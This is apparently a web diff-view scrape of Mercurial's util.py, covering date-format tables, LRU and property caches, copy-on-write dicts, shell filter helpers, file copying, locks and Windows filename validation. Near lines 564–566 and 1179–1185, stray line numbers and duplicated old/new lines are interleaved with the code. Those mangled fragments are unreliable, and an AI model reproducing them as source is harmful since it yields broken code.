564 return (vints[0], vints[1], vints[2])
564 if n == 4:
565 if n == 4:
565 return (vints[0], vints[1], vints[2], extra)
566 return (vints[0], vints[1], vints[2], extra)
566
567
# used by parsedate
# Formats are tried in order; more specific (date+time) forms come first so
# they win over the short, ambiguous ones below.
defaultdateformats = (
    '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
    '%Y-%m-%dT%H:%M',    # without seconds
    '%Y-%m-%dT%H%M%S',   # another awful but legal variant without :
    '%Y-%m-%dT%H%M',     # without seconds
    '%Y-%m-%d %H:%M:%S', # our common legal variant
    '%Y-%m-%d %H:%M',    # without seconds
    '%Y-%m-%d %H%M%S',   # without :
    '%Y-%m-%d %H%M',     # without seconds
    '%Y-%m-%d %I:%M:%S%p',
    '%Y-%m-%d %H:%M',
    '%Y-%m-%d %I:%M%p',
    '%Y-%m-%d',
    '%m-%d',
    '%m/%d',
    '%m/%d/%y',
    '%m/%d/%Y',
    '%a %b %d %H:%M:%S %Y',
    '%a %b %d %I:%M:%S%p %Y',
    '%a, %d %b %Y %H:%M:%S', #  GNU coreutils "/bin/date --rfc-2822"
    '%b %d %H:%M:%S %Y',
    '%b %d %I:%M:%S%p %Y',
    '%b %d %H:%M:%S',
    '%b %d %I:%M:%S%p',
    '%b %d %H:%M',
    '%b %d %I:%M%p',
    '%b %d %Y',
    '%b %d',
    '%H:%M:%S',
    '%I:%M:%S%p',
    '%H:%M',
    '%I:%M%p',
)
601
602
# Superset of defaultdateformats that also accepts very coarse dates
# (bare year, year-month, month name).
extendeddateformats = defaultdateformats + (
    "%Y",
    "%Y-%m",
    "%b",
    "%b %Y",
)
608
609
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount
    if argcount == 0:
        # A one-element list doubles as the "computed yet?" flag and the
        # storage slot for the single cached value.
        memo = []
        def f():
            if not memo:
                memo.append(func())
            return memo[0]
        return f
    memo = {}
    if argcount == 1:
        # Keying on the bare argument avoids packing/unpacking an args
        # tuple on every call, which is a small but real saving.
        def f(arg):
            if arg not in memo:
                memo[arg] = func(arg)
            return memo[arg]
    else:
        def f(*args):
            if args not in memo:
                memo[args] = func(*args)
            return memo[args]

    return f
634
635
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        pending = getattr(self, '_copied', 0)
        if not pending:
            # Nobody else shares this object: safe to mutate in place.
            return self
        # At least one cheap copy() is outstanding; give the writer a real
        # copy and decrement the share count on the original.
        self._copied = pending - 1
        return self.__class__(self)

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self
652
653
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # Delete first so that re-setting an existing key moves it to the
        # end of the iteration order ("last-set" order) instead of keeping
        # its old position, which is OrderedDict's default.
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v
677
678
# cow must come first in the MRO so its preparewrite()/copy() override
# nothing from dict.
class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
703
704
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """
709
710
class transactional(object):
    """Base class for making a transactional type into a context manager."""
    # Python 2 style metaclass declaration; on Python 3 this attribute is
    # inert, so abstractness is not actually enforced there.
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            # Commit only on a clean exit; an exception skips close() so
            # release() aborts the transaction.
            if exc_type is None:
                self.close()
        finally:
            # release() runs unconditionally, even if close() raised.
            self.release()
734
735
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        # InterventionRequired is not a failure: commit what we have
        # before re-raising so the user can resume later.
        tr.close()
        raise
    finally:
        # Always released; aborts the transaction if close() never ran.
        tr.release()
752
753
@contextlib.contextmanager
def nullcontextmanager():
    """A context manager that does nothing, for use as a default value."""
    yield
756
757
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    # __slots__ keeps per-node overhead down; a cache may hold many nodes.
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        self.next = None
        self.prev = None

        # _notset is a module-level sentinel marking a node that holds no
        # entry (so None remains a legal key/value).
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
775
776
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        self._cache = {}

        # Start with a single self-linked node; further nodes are added
        # lazily by _addcapacity() as entries are inserted, up to 'max'.
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        # Deliberately does NOT call _movetohead(): a get() miss-tolerant
        # lookup does not refresh the entry's recency.
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        # Empty every live node in the ring (stops at the first already
        # empty node), then drop the backing dict entries.
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node
934
935
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    # 'order' tracks keys from oldest (left) to newest (right); the cache
    # is trimmed once it exceeds 20 entries.
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg in cache:
                # Cache hit: refresh recency only.
                order.remove(arg)
            else:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args in cache:
                order.remove(args)
            else:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            order.append(args)
            return cache[args]

    return f
961
962
class propertycache(object):
    """Descriptor caching the decorated function's result on the instance.

    This is a non-data descriptor (no __set__), so once cachevalue() has
    stored the result in the instance __dict__ that attribute shadows the
    descriptor and later accesses skip __get__ entirely.
    """
    def __init__(self, func):
        self.func = func
        self.name = func.__name__
    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
974
975
def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    # EAFP: attempt the delete and tolerate an absent entry.
    try:
        del obj.__dict__[prop]
    except KeyError:
        pass
979
980
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    # NOTE(review): 'closefds' is a module-level default defined outside
    # this block — presumably platform dependent; verify before changing.
    # stderr is not captured, so perr is always None here.
    p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    pout, perr = p.communicate(s)
    return pout
986
987
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname, outname = None, None
    try:
        # Write the input to a temp file the command can read.
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, pycompat.sysstr('wb'))
        fp.write(s)
        fp.close()
        # Pre-create the output file; the command will overwrite it.
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        # On OpenVMS an odd status means success.
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # Best-effort cleanup of both temp files; each unlink is guarded
        # independently so failure to remove one doesn't leak the other.
        try:
            if inname:
                os.unlink(inname)
        except OSError:
            pass
        try:
            if outname:
                os.unlink(outname)
        except OSError:
            pass
1020
1021
# Maps a filter command prefix to the function implementing that filter
# style; consulted by filter() below.
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
}
1025
1026
def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    for name, fn in filtertable.iteritems():
        if cmd.startswith(name):
            # Strip the recognized prefix and surrounding whitespace
            # before handing the command to its implementation.
            return fn(s, cmd[len(name):].lstrip())
    # No recognized prefix: default to a shell pipe filter.
    return pipefilter(s, cmd)
1032
1033
def binary(s):
    """return true if a string is binary data"""
    # Heuristic: a NUL byte anywhere marks the data as binary; empty or
    # None input is never considered binary.
    if not s:
        return False
    return '\0' in s
1036
1037
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def _floorlog2(value):
        # floor(log2(value)) for value > 0; defined as 0 for value == 0.
        if not value:
            return 0
        return value.bit_length() - 1

    pending = []
    size = 0
    for chunk in source:
        pending.append(chunk)
        size += len(chunk)
        if size >= min:
            if min < max:
                # Grow the threshold: at least double it, or jump to the
                # largest power of two not exceeding what we just emitted,
                # capped at max.
                min = min << 1
                rounded = 1 << _floorlog2(size)
                if rounded > min:
                    min = rounded
                if min > max:
                    min = max
            yield ''.join(pending)
            size = 0
            pending = []
    # Flush whatever is left, even if it is below the threshold.
    if pending:
        yield ''.join(pending)
1067
1068
# Module-local alias for error.Abort.
Abort = error.Abort

def always(fn):
    # Predicate that accepts any input.
    return True

def never(fn):
    # Predicate that rejects any input.
    return False
1075
1076
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue have been fixed in 2.7. But it still affect
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            # Re-enable only if the caller had GC on, keeping nested
            # nogc-wrapped calls well-behaved.
            if gcenabled:
                gc.enable()
    return wrapper

if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x
1102
1103
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            # Different drives (Windows): no relative path exists, so
            # anchor n2 at root instead.
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    # Strip the common leading components of both paths.
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    # Climb out of what remains of n1, then descend into n2.
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1128
1129
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    return (safehasattr(sys, "frozen") or # new py2exe
            safehasattr(sys, "importers") or # old py2exe
            imp.is_frozen(u"__main__")) # tools/freeze
1138
1139
# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)
1147
1148
# Cached location of the 'hg' executable; filled in lazily by
# hgexecutable() via _sethgexecutable().
_hgexecutable = None

def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.
    """
    if _hgexecutable is None:
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[pycompat.sysstr('__main__')]
        if hg:
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            # Running directly from the 'hg' script.
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            # Fall back to searching PATH, then to whatever we were
            # invoked as.
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable
1173
1174
def _sethgexecutable(path):
    """set location of the 'hg' executable

    Module-private setter backing hgexecutable()'s lazy cache.
    """
    global _hgexecutable
    _hgexecutable = path
1178
1179
1179 def _isstdout(f):
1180 def _isstdout(f):
1180 fileno = getattr(f, 'fileno', None)
1181 fileno = getattr(f, 'fileno', None)
1181 return fileno and fileno() == sys.__stdout__.fileno()
1182 try:
1183 return fileno and fileno() == sys.__stdout__.fileno()
1184 except io.UnsupportedOperation:
1185 return False # fileno() raised UnsupportedOperation
1182
1186
def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out

    Values from *environ* are flattened into shell-friendly strings:
    None/False become '0', True becomes '1'; everything else is
    converted with pycompat.bytestr.  $HG is always set to the hg
    executable's location.
    """
    def _tostr(value):
        'convert python object into string that is useful to shell'
        if value is True:
            return '1'
        if value is None or value is False:
            return '0'
        return pycompat.bytestr(value)
    env = dict(encoding.environ)
    if environ:
        for key, value in environ.iteritems():
            env[key] = _tostr(value)
    env['HG'] = hgexecutable()
    return env
1197
1201
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.'''
    try:
        # flush our own buffered output so it appears before the child's
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is None or _isstdout(out):
        # the child can inherit our stdout directly; no piping needed
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        # capture the child's combined stdout/stderr and copy it into
        # 'out' line by line
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        for line in iter(proc.stdout.readline, ''):
            out.write(line)
        proc.wait()
        rc = proc.returncode
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        # OpenVMS return codes with the low bit set are treated as success
        rc = 0
    return rc
1224
1228
def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def checked(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            tb = sys.exc_info()[2]
            # a single-frame traceback means func itself rejected the
            # arguments (bad signature), not that something deeper failed
            if len(traceback.extract_tb(tb)) == 1:
                raise error.SignatureError
            raise

    return checked
1236
1240
# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}
1252
1256
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            # remember dest's stat so we can detect mtime/ctime ambiguity
            # after the copy replaces it
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one;
                    # bump mtime by one second (clamped to 31 bits) so the
                    # change is detectable
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise Abort(str(inst))
1304
1308
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible.

    Returns a (hardlink, num) pair: whether hardlinking remained viable
    throughout, and how many files were copied/linked.
    """
    num = 0

    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            # hardlinking only makes sense within one device
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                # offset nested progress by the files already processed
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # once a link fails, stop trying for the rest of the tree
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    progress(topic, None)

    return hardlink, num
1344
1348
# base file names rejected on Windows regardless of extension
# (checkwinfilename compares the part before the first '.')
_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
# characters that may not appear anywhere in a Windows file name
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    # examine each path component, treating '\' and '/' as separators
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                # control characters (0x00-0x1f) are invalid
                return _("filename contains '%s', which is invalid "
                         "on Windows") % escapestr(c)
        # the reserved-name check applies to the part before the first dot
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t
1397
1401
# pick platform-appropriate filename validation and wall-clock timer
if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    # prefer the high-resolution performance counter when available
    timer = time.perf_counter
1407
1411
def makelock(info, pathname):
    """Create a lock at pathname whose payload is info.

    A symlink (with info as its target) is preferred; if symlinks are
    unavailable, fall back to an exclusively-created regular file.
    An already-existing lock propagates as OSError(EEXIST).
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        # EEXIST means someone else holds the lock: a hard error.
        # Any other OSError falls through to the plain-file fallback.
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    # O_EXCL makes the creation itself the atomic lock acquisition
    ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
    os.write(ld, info)
    os.close(ld)
1420
1424
def readlock(pathname):
    """Read a lock's payload: symlink target, or file contents.

    Counterpart of makelock(); handles both lock representations.
    """
    try:
        return os.readlink(pathname)
    except OSError as why:
        # EINVAL: pathname is not a symlink; ENOSYS: no symlink support.
        # Both mean the lock is a regular file; read it below.
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname)
    r = fp.read()
    fp.close()
    return r
1433
1437
def fstat(fp):
    """stat a file object, tolerating objects without a fileno() method

    Objects lacking fileno() are stat'ed through their .name attribute.
    """
    fileno = getattr(fp, 'fileno', None)
    if fileno is None:
        return os.stat(fp.name)
    return os.fstat(fileno())
1440
1444
1441 # File system features
1445 # File system features
1442
1446
def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    origstat = os.lstat(path)
    dirname, basename = os.path.split(path)
    # build a case-swapped sibling name to probe with
    swapped = basename.upper()
    if swapped == basename:
        swapped = basename.lower()
    if swapped == basename:
        # nothing in the name folds; no evidence against case sensitivity
        return True
    try:
        probestat = os.lstat(os.path.join(dirname, swapped))
    except OSError:
        # swapped-case name does not resolve: filesystem is case-sensitive
        return True
    # identical stat means both spellings name one file: case-insensitive
    return probestat != origstat
1465
1469
try:
    import re2
    # None means "re2 imported, but not validated yet"; _re._checkre2()
    # lazily replaces it with the real verdict (True/False)
    _re2 = None
except ImportError:
    _re2 = False
1471
1475
class _re(object):
    """Facade over the standard 're' module that transparently prefers
    the faster re2 engine when it is installed and usable."""

    def _checkre2(self):
        global _re2
        try:
            # probe that re2's match actually works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            # re2 takes inline flags instead of a flags argument
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        return remod.escape

re = _re()
1516
1520
# cache of directory listings keyed by directory path (see fspath)
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        # map normcased name -> on-disk name for every entry in dir
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # str.replace returns a new string, so its result must be assigned;
    # without the escaping, a '\' inside the [...] character classes below
    # would merely escape the following separator character instead of
    # matching a literal backslash.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            # separators pass through unchanged
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)
1559
1563
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        # best-effort cleanup of the probe files; ignore races
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass
1588
1592
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    if path.endswith(pycompat.ossep):
        return True
    # fall back to the alternate separator, when the platform has one
    return pycompat.osaltsep and path.endswith(pycompat.osaltsep)
1593
1597
def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
